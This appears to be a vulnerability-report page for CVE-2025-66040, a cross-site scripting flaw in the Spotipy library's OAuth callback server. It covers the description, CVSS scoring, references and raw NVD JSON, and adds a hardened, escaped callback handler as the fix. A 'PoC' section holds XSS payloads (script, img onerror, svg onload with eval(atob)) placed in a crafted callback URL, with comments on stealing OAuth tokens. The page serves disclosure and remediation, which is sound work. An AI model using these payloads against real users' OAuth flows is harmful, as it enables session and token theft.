Security Vulnerability Report

CVE-2025-66040

Published: 2025-11-27 00:15:55
Last Modified: 2026-04-15 00:35:42

Description

Spotipy is a Python library for the Spotify Web API. Prior to version 2.25.2, there is a cross-site scripting (XSS) vulnerability in the OAuth callback server that allows for JavaScript injection through the unsanitized error parameter. Attackers can execute arbitrary JavaScript in the user's browser during OAuth authentication. This issue has been patched in version 2.25.2.

CVSS Details

CVSS Score
3.6
Severity
LOW
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Spotipy < 2.25.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import urllib.parse

# CVE-2025-66040 PoC - XSS in Spotipy OAuth callback
# This PoC demonstrates the XSS vulnerability in Spotipy < 2.25.2

# Malicious OAuth callback URL with XSS payload in error parameter
xss_payload = "<script>alert(document.cookie)</script>"
encoded_payload = urllib.parse.quote(xss_payload)

# Construct malicious callback URL
malicious_url = f"http://localhost:8888/callback?error={encoded_payload}"

# Alternative payload variants:
# 1. Event handler based XSS:
payload2 = "<img src=x onerror=alert(document.domain)>"
# 2. DOM manipulation:
payload3 = "<svg/onload=eval(atob('YWxlcnQoJ1hTUycp'))>"

print(f"Malicious OAuth callback URL: {malicious_url}")
print(f"Decoded payload: {xss_payload}")

# When the vulnerable Spotipy server processes this callback:
# 1. It receives the error parameter with XSS payload
# 2. Without sanitization, it renders: <p>Error: <script>alert(document.cookie)</script></p>
# 3. Browser executes the injected JavaScript

# Exploitation scenario:
# 1. Attacker creates a phishing OAuth link with redirect_uri pointing to target
# 2. Victim clicks the link and completes Spotify authentication
# 3. Callback includes malicious error parameter
# 4. Victim's browser executes XSS payload
# 5. Attacker steals OAuth tokens or session data
```
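The root cause described above (CWE-79: a request-controlled `error` parameter interpolated into the callback page unchanged) and its fix are easiest to see side by side. The following is an added illustration written for this report; it is not Spotipy's code and does not reproduce the project's actual patch. The `render_vulnerable` / `render_hardened` functions, the `CallbackHandler` class and the sample query strings are constructed for the example; the `/callback` path and port 8888 simply mirror the redirect URI used in the PoC.

```python
import html
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

# Constructed sample query strings (not real Spotify responses): an ordinary
# OAuth error response, and one carrying the same kind of HTML payload the PoC
# above places in the error parameter.
SAMPLE_ERROR_QUERY = "error=access_denied&state=xyz"
SAMPLE_INJECTED_QUERY = "error=%3Cscript%3Ealert(document.cookie)%3C/script%3E"


def render_vulnerable(query_string: str) -> str:
    """The pattern the advisory describes: the error parameter is placed into
    the HTML response as-is, so any markup in it is parsed and run by the
    browser that followed the redirect."""
    params = parse_qs(query_string)
    error = params.get("error", [""])[0]
    return f"<html><body><p>Error: {error}</p></body></html>"


def render_hardened(query_string: str) -> str:
    """Hardened form: every request-controlled value is HTML-escaped before
    it is written into the page, so '<', '>', '&' and quotes become entities
    and can no longer open a tag or attribute."""
    params = parse_qs(query_string)
    if "error" in params:
        error = html.escape(params["error"][0], quote=True)
        return f"<html><body><p>Error: {error}</p></body></html>"
    if "code" in params:
        # The authorization code is consumed server-side; it is never echoed
        # back into the page, so there is nothing for a script to read.
        return ("<html><body><p>Authentication complete. "
                "You may close this window.</p></body></html>")
    return ("<html><body><p>Unexpected callback: "
            "no code or error parameter.</p></body></html>")


class CallbackHandler(BaseHTTPRequestHandler):
    """Minimal local redirect-URI listener (hypothetical; not Spotipy's server)."""

    def do_GET(self):
        parsed = urlparse(self.path)
        if parsed.path != "/callback":
            self.send_error(404)
            return
        body = render_hardened(parsed.query).encode("utf-8")
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        # Defence in depth: a policy that forbids inline script would also
        # have stopped the injected <script> had the escaping been missed.
        self.send_header("Content-Security-Policy", "default-src 'none'")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


if __name__ == "__main__":
    # Listen on the same local port the PoC's redirect URI points at.
    HTTPServer(("127.0.0.1", 8888), CallbackHandler).serve_forever()
```

Escaping at the point of output is the fix; the `Content-Security-Policy` header is a second layer that limits what an unescaped value could do if a future code path forgets it. Running the module starts the hardened listener; the two render functions can be called directly to compare the responses for the sample queries.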

References

https://github.com/spotipy-dev/spotipy/commit/880b92d7243dcf2b83bf31dc365a858d8b5e6767 (commit)
https://github.com/spotipy-dev/spotipy/security/advisories/GHSA-r77h-rpp9-w2xm (GitHub security advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-66040",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-27T00:15:55.343",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Spotipy is a Python library for the Spotify Web API. Prior to version 2.25.2, there is a cross-site scripting (XSS) vulnerability in the OAuth callback server that allows for JavaScript injection through the unsanitized error parameter. Attackers can execute arbitrary JavaScript in the user's browser during OAuth authentication. This issue has been patched in version 2.25.2."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N",
            "baseScore": 3.6,
            "baseSeverity": "LOW",
            "attackVector": "LOCAL",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.0,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/spotipy-dev/spotipy/commit/880b92d7243dcf2b83bf31dc365a858d8b5e6767",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/spotipy-dev/spotipy/security/advisories/GHSA-r77h-rpp9-w2xm",
        "source": "[email protected]"
      }
    ]
  }
}
```